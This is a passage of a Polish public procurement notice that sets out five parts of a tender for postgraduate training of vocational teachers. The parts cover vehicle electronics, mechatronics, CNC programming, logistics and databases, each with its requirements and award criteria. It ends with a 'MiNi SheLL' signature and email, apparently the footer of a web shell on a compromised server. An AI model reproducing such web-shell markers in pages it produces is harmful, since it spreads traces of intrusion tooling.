3.	Spełnienie wymogów programowych określonych w Rozporządzeniu Ministra Nauki i Szkolnictwa Wyższego z dnia 17 stycznia 2012 roku w sprawie standardów kształcenia przygotowującego do wykonania zawodu nauczyciela ( Dz.U.2012 poz. 131) w zakresie dotyczącym kształcenia na studiach podyplomowych.
4.	Kształcenie na studiach podyplomowych umożliwi nauczycielowi poszerzenie  kompetencji zawodowych do nauczania przedmiotów zawodowych poprzez zdobycie wiedzy z zakresu elektrotechniki i elektroniki pojazdów samochodowych ze szczególnym uwzględnieniem pojazdów ekologicznych greencars.
5.	Realizacja studiów podyplomowych zgodnie z ustawą z dnia 27 lipca 2005r. Prawo o szkolnictwie wyższym ( t.j. Dz. U. 2012  poz. 572 z poźn. zm.)
6.	Potwierdzenie ukończenia studiów podyplomowych świadectwem/dyplomem zgodnym z Rozporządzeniem Ministra Nauki i Szkolnictwa Wyższego z dnia 1 września 2011w sprawie tytułów zawodowych nadawanych absolwentom studiów, warunków wydawania oraz niezbędnych elementów dyplomów ukończenia studiów podyplomowych oraz wzoru suplementu do dyplomu (Dz. U. 2011 nr 196 poz. 1167) .
7.	Właściwe udokumentowanie przebiegu studiów  na potrzeby realizacji projektu:
- przekazanie szczegółowego programu studiów,
- opracowanie przez wykonawcę instrumentów (np. egzaminów, testów) potwierdzających nabycie kompetencji określonych w warunkach szczegółowych w pkt.4,
- weryfikacja nabycia kompetencji określonych w warunkach szczegółowych z wykorzystaniem opracowanych przez Wykonawcę instrumentów w pkt. 4,
- potwierdzenie nabycia kompetencji określonych w warunkach szczegółowych w pkt. 4 wraz z kopią wykorzystanych instrumentów,
- wykonawca zobowiązany będzie do prowadzenia list obecności oraz przekazania ich ( kopia potwierdzonych za zgodność z oryginałem)  Zamawiającemu po zakończeniu każdego semestru studiów podyplomowych,
8. Zajęcia będą się odbywać w trybie niestacjonarnym.
9.  Przedmiot zamówienia zawiera wydatki związane z pełną organizacją i przeprowadzeniem studiów podyplomowych m.in. wynagrodzenie wykładowców, wynajęcie i eksploatacja sal, sprzętu technicznego, wyposażenie sal niezbędnych do przeprowadzenia studiów, dyplomy/świadectwa potwierdzające  ukończenie studiów wraz z opisem uzyskanych kompetencji.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80300000-7, 80430000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin zapłaty faktury</td><td>20</td></tr><tr><td>materiały szkoleniowe</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>STUDIA PODYPLOMOWEW ZAKRESIE TECHNIKA I MECHATRONIKA POJAZDÓW SAMOCHODOWYCH<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Program studiów podyplomowych umożliwi podniesienie kompetencji zawodowych w nauczaniu przedmiotów zawodowych w zakresie: technika i mechatronika pojazdów samochodowych.
TEMATYKA ZAJĘĆ
Tematyka zajęć obejmuje w szczególności następujące zagadnienia: działanie oraz eksploatacja układów mechanicznych i mechatronicznych pojazdów, oceny stanu technicznego i przyczyn wystąpienia uszkodzenia pojazdów samochodowych. 
WARUNKI SZCZEGÓŁOWE
1.Liczba osób objętych studiami podyplomowymi 2 nauczycieli (0K i 2M),
2.Czas trwania studiów 3 semestry.
3.Spełnienie wymogów programowych określonych w Rozporządzeniu Ministra Nauki i Szkolnictwa Wyższego z dnia 17 stycznia 2012 roku w sprawie standardów kształcenia przygotowującego do wykonania zawodu nauczyciela (Dz.U.2012  poz. 131) w zakresie dotyczącym kształcenia na studiach podyplomowych.
4.Kształcenie na studiach podyplomowych umożliwi nauczycielowi poszerzenie kompetencji zawodowych do nauczania przedmiotów zawodowych poprzez zdobycie wiedzy z zakresu zagadnień dotyczących działania, eksploatacji układów mechanicznych, mechatronicznych pojazdów, oceny stanu technicznego przyczyn wystąpienia uszkodzeń pojazdów samochodowych..
5.Realizacja studiów podyplomowych zgodnie z ustawą z dnia 27 lipca 2005r. Prawo o szkolnictwie wyższym ( t.j. Dz. U. 2012  poz. 572 z poźn. zm.)
6.Potwierdzenie ukończenia studiów podyplomowych świadectwem/dyplomem zgodnym z Rozporządzeniem Ministra Nauki i Szkolnictwa Wyższego z dnia 1września 2011 w sprawie tytułów zawodowych nadawanych absolwentom studiów, warunków wydawania oraz niezbędnych elementów dyplomów ukończenia studiów podyplomowych oraz wzoru suplementu do dyplomu (Dz. U. 2011 nr 196 poz. 1167) .
7. Właściwe udokumentowanie przebiegu studiów  na potrzeby realizacji projektu:
- przekazanie szczegółowego programu studiów,
- opracowanie przez wykonawcę instrumentów (np. egzaminów, testów)potwierdzających nabycie kompetencji określonych w warunkach szczegółowych pkt.4,
- weryfikacja nabycia kompetencji określonych w warunkach szczegółowych z wykorzystaniem opracowanych przez Wykonawcę instrumentów w pkt. 4,
- potwierdzenie nabycia kompetencji określonych w warunkach szczegółowych w pkt. 4 wraz z kopią wykorzystanych instrumentów,
- wykonawca zobowiązany będzie do prowadzenia list obecności oraz przekazania ich(kopia potwierdzonych za zgodność z oryginałem)  Zamawiającemu po zakończeniu każdego semestru studiów podyplomowych,
8. Zajęcia będą się odbywać w trybie niestacjonarnym.
9.Przedmiot zamówienia zawiera wydatki związane z pełną organizacją i przeprowadzeniem studiów podyplomowych m.in. wynagrodzenie wykładowców, wynajęcie i eksploatacja sal, sprzętu technicznego, wyposażenie sal niezbędnych do przeprowadzenia studiów, dyplomy/świadectwa potwierdzające  ukończenie studiów wraz z opisem uzyskanych kompetencji.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80300000-7, 80430000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/03/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin zapłaty faktury</td><td>20</td></tr><tr><td>materiały szkoleniowe</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>STUDIA PODYPLOMOWEW ZAKRESIE PROGRAMOWANIE OBRABIAREK STEROWANYCH NUMERYCZNIE<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Program studiów podyplomowych umożliwi podniesienie kompetencji zawodowych w nauczaniu przedmiotów zawodowych w zakresie: projektowanie w systemach CAD/CAM wraz z programowaniem obrabiarek CNC.
TEMATYKA ZAJĘĆ
Tematyka zajęć obejmuje w szczególności następujące zagadnienia: obsługa i programowanie centrów obróbczych ze sterowaniem HEIDENHAIN, FANUC, SIMUMERIK, korzystanie z sond pomiarowych RENISHAW, opracowanie procesów technologicznych dla obrabiarek CNC, komputerowe wspomaganie wytwarzania CAD/CAM/CAE, podstawowe zasady projektowania procesów technologicznych, zasady organizacji produkcji i eksploatacji wyrobów.
WARUNKI SZCZEGÓŁOWE
1.Liczba osób objętych studiami podyplomowymi 1 nauczyciel (0K i 1M).
2.Czas trwania studiów 2 semestry.
3.Spełnienie wymogów programowych określonych w Rozporządzeniu Ministra Naukii Szkolnictwa Wyższego z dnia 17 stycznia 2012 roku w sprawie standardów kształcenia przygotowującego do wykonania zawodu nauczyciela ( Dz.U.2012 poz.131) w zakresie dotyczącym kształcenia na studiach podyplomowych.
4.Kształcenie na studiach podyplomowych umożliwi nauczycielowi poszerzenie kompetencji zawodowych do nauczania przedmiotów zawodowych poprzez zdobycie wiedzy z zakresu projektowania konstrukcji maszyn i urządzeń przy wykorzystaniu systemów CAD, projektowania technologicznego przy wykorzystaniu systemów CAM, dobór i optymalizacja parametrów obróbkowych, programowanie obrabiarek.
5.Realizacja studiów podyplomowych zgodnie z ustawą z dnia 27 lipca 2005r. Prawo o szkolnictwie wyższym ( t.j. Dz. U. 2012  poz. 572 z poźn. zm.)
6.Potwierdzenie ukończenia studiów podyplomowych świadectwem/dyplomem zgodnym z Rozporządzeniem Ministra Nauki i Szkolnictwa Wyższego z dnia 1 września 2011 w sprawie tytułów zawodowych nadawanych absolwentom studiów, warunków wydawania oraz niezbędnych elementów dyplomów ukończenia studiów podyplomowych oraz wzoru suplementu do dyplomu (Dz. U. 2011 nr 196 poz. 1167) .
7.	Właściwe udokumentowanie przebiegu studiów  na potrzeby realizacji projektu:
- przekazanie szczegółowego programu studiów,
- opracowanie przez wykonawcę instrumentów (np. egzaminów, testów) potwierdzających nabycie kompetencji określonych w warunkach szczegółowych w pkt.4,
- weryfikacja nabycia kompetencji określonych w warunkach szczegółowych z wykorzystaniem opracowanych przez Wykonawcę instrumentów w pkt. 4,
- potwierdzenie nabycia kompetencji określonych w warunkach szczegółowych w pkt. 4 wraz z kopią wykorzystanych instrumentów,
- wykonawca zobowiązany będzie do prowadzenia list obecności oraz przekazania ich (kopia potwierdzonych za zgodność z oryginałem)  Zamawiającemu po zakończeniu każdego semestru studiów podyplomowych.
8. Zajęcia będą się obywać w trybie niestacjonarnym.
9.  Przedmiot zamówienia zawiera wydatki związane z pełną organizacją i przeprowadzeniem studiów podyplomowych m.in. wynagrodzenie wykładowców, wynajęcie i eksploatacja sal, sprzętu technicznego, wyposażenie sal niezbędnych do przeprowadzenia studiów, dyplomy/świadectwa potwierdzające  ukończenie studiów wraz z opisem uzyskanych kompetencji.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80300000-7, 80430000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin zapłaty faktury</td><td>20</td></tr><tr><td>materiały szkoleniowe</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>IV
                  
                <b>Nazwa: </b>STUDIA PODYPLOMOWE W ZAKRESIE LOGISTYKA I SPEDYCJA<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Program studiów podyplomowych
Program studiów podyplomowych umożliwi podniesienie kompetencji zawodowych w nauczaniu przedmiotów zawodowych w zakresie znajomości zasad zarządzania, metod oraz narzędzi wspomagających podejmowanie decyzji w zakresie usług logistycznych i spedycyjnych będących przedmiotem zajęć oraz umiejętności ich stosowania, znajomości systemu informatycznego wspomagającego podejmowanie decyzji w zakresie usług logistycznych i spedycyjnych, wiedzy na temat zarządzania jakością i bezpieczeństwem w transporcie, podstawowej wiedzy związanej z wybranymi zagadnieniami z zakresu zarządzania i inżynierii produkcji oraz wykorzystaniem nowych technologii stosowanych w zarządzaniu procesami logistycznymi w tym zintegrowanym systemem zarządzania produkcją, wiedzy na temat prowadzenia gospodarki magazynowej oraz zaopatrzenia 
i dystrybucji.


Tematyka zajęć
Tematyka zajęć obejmuje w szczególności następujące zagadnienia: Przedsiębiorstwo logistyczno-spedycyjne, Transport i spedycja, Prawo transportowe, Przewozy ładunków, Logistyka, Zarządzanie w TSL, Logistyka w jednostkach gospodarczych i administracyjnych, Logistyka marketingowa, Zapasy i magazynowanie, Procesy transportowe w logistyce, Usługi logistyczno-spedycyjne, Statystyka, Gospodarka elektroniczna w TSL, Laboratorium logistyczno-spedycyjne, Laboratorium magazynowe, Wykład monograficzny, Język obcy w spedycji i logistyce, Seminarium dyplomowe, Dydaktyka przedmiotowa, Praktyka szkolna.

Warunki szczegółowe
1.	Liczba osób objętych studiami podyplomowymi 2 nauczycieli (1 K i 1 M),
2.	Czas trwania studiów: 3 semestry, 
3.	Co najmniej 80% programu kształcenia może odbywać się przy użyciu platformy  e-learningowej
a pozostałe zajęcia prowadzone będą w formie niestacjonarnej. Nie jest możliwe prowadzenie zajęć wyłącznie w formie e-learningowej.
4.	Spełnienie wymogów programowych określonych w Rozporządzeniu Ministra Nauki  
i Szkolnictwa Wyższego z dnia 17 stycznia 2012 roku w sprawie standardów kształcenia przygotowującego do wykonania zawodu nauczyciela ( Dz.U.2012 poz. 131) w zakresie dotyczącym kształcenia na studiach podyplomowych,
5.	Kształcenie na studiach podyplomowych umożliwi nauczycielowi poszerzenie  kompetencji zawodowych do nauczania przedmiotów zawodowych poprzez zdobycie wiedzy z zakresu znajomości zasad zarządzania, metod oraz narzędzi wspomagających podejmowanie decyzji w zakresie usług logistycznych i spedycyjnych będących przedmiotem zajęć oraz umiejętności ich stosowania, znajomości systemu informatycznego wspomagającego podejmowanie decyzji w zakresie usług logistycznych i spedycyjnych, wiedzy na temat zarządzania jakością i bezpieczeństwem w transporcie, podstawowej wiedzy związanej z wybranymi zagadnieniami z zakresu zarządzania i inżynierii produkcji oraz wykorzystaniem nowych technologii stosowanych w zarządzaniu procesami logistycznymi w tym zintegrowanym systemem zarządzania produkcją, wiedzy na temat prowadzenia gospodarki magazynowej oraz zaopatrzenia i dystrybucji,
6. Realizacja studiów podyplomowych zgodnie z ustawą z dnia 27 lipca 2005r. Prawo    
o szkolnictwie wyższym ( t.j. Dz. U. 2012  poz. 572 z poźn. zm.)
7. Potwierdzenie ukończenia studiów podyplomowych świadectwem/dyplomem zgodnym z Rozporządzeniem Ministra Nauki i Szkolnictwa Wyższego z dnia 1 września 2011 w sprawie tytułów zawodowych nadawanych absolwentom studiów, warunków wydawania oraz niezbędnych elementów dyplomów ukończenia studiów podyplomowych oraz wzoru suplementu do dyplomu (Dz. U. 2011 nr 196 poz. 1167),
8. Właściwe udokumentowanie przebiegu studiów  na potrzeby realizacji projektu:
- przekazanie szczegółowego programu studiów,
- opracowanie przez wykonawcę instrumentów (np. egzaminów, testów) potwierdzających nabycie kompetencji określonych w warunkach szczegółowych w pkt.5,
- weryfikacja nabycia kompetencji określonych w warunkach szczegółowych z wykorzystaniem opracowanych przez Wykonawcę instrumentów w pkt. 5,
- potwierdzenie nabycia kompetencji określonych w warunkach szczegółowych w pkt. 5 wraz z kopią wykorzystanych instrumentów,
- wykonawca zobowiązany będzie do prowadzenia list obecności oraz przekazania ich (kopia potwierdzonych za zgodność z oryginałem) Zamawiającemu po zakończeniu każdego semestru studiów podyplomowych, 
9. Przedmiot zamówienia zawiera wydatki związane z pełną organizacją i przeprowadzeniem studiów  podyplomowych m.in. wynagrodzenie wykładowców, wynajęcie i eksploatacja sal, sprzętu technicznego, wyposażenie sal niezbędnych do przeprowadzenia studiów, dyplomy/świadectwa potwierdzające  ukończenie studiów wraz z opisem uzyskanych kompetencji.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80300000-7, 80430000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/03/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termn zapłaty faktury</td><td>20</td></tr><tr><td>materiały szkoleniowe</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>V
                  
                <b>Nazwa: </b>STUDIA PODYPLOMOWE W ZAKRESIE INFORMATYKA: BAZY DANYCH I TWORZENIE PORTALI INTERNETOWYCH/SYSTEMY BAZ DANYCH<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Program studiów podyplomowych
Program studiów podyplomowych umożliwi podniesienie kompetencji zawodowych 
w nauczaniu przedmiotów zawodowych w zakresie: zastosowania metod programowania 
w języku PHP5 do rozwiązywania problemów informatycznych, konstruowania  aplikacji wielowarstwowych, stosowania narzędzi administrowania bazami danych i ochrony danych, stosowania zaawansowanych metod formatowania tekstu oraz osadzania elementów graficznych i multimedialnych, stosowania struktury języka programowania JavaScript w praktycznych zadaniach programistycznych, wykorzystania języka SQL do definiowania i obrabiania danych, możliwości zastosowania metod informatycznych do rozwiązywania problemów dotyczących baz danych i tworzenia portali internetowych, konieczności rozwoju informatycznego, zdolności oceny przydatności narzędzi informatycznych do rozwiązywania problemów praktycznych, współpracy w grupie w celu rozwiązywania problemów.
Tematyka zajęć
Tematyka zajęć obejmuje w szczególności następujące zagadnienia: projektowania i administrowania bazą danych, programowania w języku PHP5, użytkowania i administrowania systemu UNIX, programowania w języku JavaScript, praktyczne zastosowanie języka PL/SQL.
Warunki szczegółowe
1.	Liczba osób objętych studiami podyplomowymi 1 nauczyciel (mężczyzna).
2.	Czas trwania studiów: 2 semestry.
3.	Spełnienie wymogów określonych w rozporządzeniu Ministra Nauki i Szkolnictwa Wyższego  z dnia 17 stycznia 2012 roku w sprawie standardów kształcenia przygotowującego do wykonania zawodu nauczyciela (Dz.U.2012 poz. 131) w zakresie dotyczącym kształcenia na studiach podyplomowych.
4.	Kształcenie na studiach podyplomowych umożliwi nauczycielowi poszerzenie kompetencji zawodowych do nauczania przedmiotu zawodowego poprzez zdobycie wiedzy z zakresu zastosowania metod programowania w języku PHP5 do rozwiązywania problemów informatycznych, konstruowania  aplikacji wielowarstwowych, stosowania narzędzi administrowania bazami danych i ochrony danych, stosowania zaawansowanych metod formatowania tekstu oraz osadzania elementów graficznych i multimedialnych, stosowania struktury języka programowania JavaScript w praktycznych zadaniach programistycznych, wykorzystania języka SQL do definiowania i obrabiania danych, możliwości zastosowania metod informatycznych do rozwiązywania problemów dotyczących baz danych i tworzenia portali internetowych, konieczności rozwoju informatycznego, zdolności oceny przydatności narzędzi informatycznych do rozwiązywania problemów praktycznych, współpracy w grupie w celu rozwiązywania problemów.
5. Realizacja studiów podyplomowych zgodnie z ustawą z dnia 27 lipca 2005 roku Prawo o szkolnictwie wyższym ( t.j. Dz. U. 2012  poz. 572 z poźn. zm.)
6. Potwierdzenie ukończenia studiów podyplomowych świadectwem/dyplomem zgodnym z Rozporządzeniem Ministra Nauki i Szkolnictwa Wyższego z dnia 1 września 2011 w sprawie tytułów zawodowych nadawanych absolwentom studiów, warunków wydawania oraz niezbędnych elementów dyplomów ukończenia studiów podyplomowych oraz wzoru suplementu do dyplomu (Dz. U. 2011 nr 196 poz. 1167). 
7. Właściwe udokumentowanie przebiegu studiów na potrzeby realizacji projektu:
- przekazanie szczegółowego programu studiów,
- opracowanie przez Wykonawcę instrumentów (np. egzaminów, testów) potwierdzających nabycie kompetencji określonych w warunkach szczegółowych w pkt.4,
- weryfikacja nabycia kompetencji określonych w warunkach szczegółowych z wykorzystaniem opracowanych przez Wykonawcę instrumentów w pkt. 4,
- potwierdzenie nabycia kompetencji określonych w warunkach szczegółowych w pkt. 4 wraz z kopią wykorzystanych instrumentów,
- wykonawca zobowiązany będzie do prowadzenia list obecności oraz przekazania ich (kopia potwierdzonych za zgodność z oryginałem)  Zamawiającemu po zakończeniu każdego semestru studiów podyplomowych, 
8. Przedmiot zamówienia zawiera wydatki związane z pełną organizacją i przeprowadzeniem studiów podyplomowych m.in. wynagrodzenie wykładowców, wynajęcie i eksploatacja sal, sprzętu technicznego, wyposażenie sal niezbędnych do przeprowadzenia studiów, dyplomy/świadectwa potwierdzające  ukończenie studiów wraz z opisem uzyskanych kompetencji.
9. Zajęcia będą się odbywać w trybie niestacjonarnym.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80300000-7, 80430000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin zapłaty faktury</td><td>20</td></tr><tr><td>materiały szkoleniowe</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com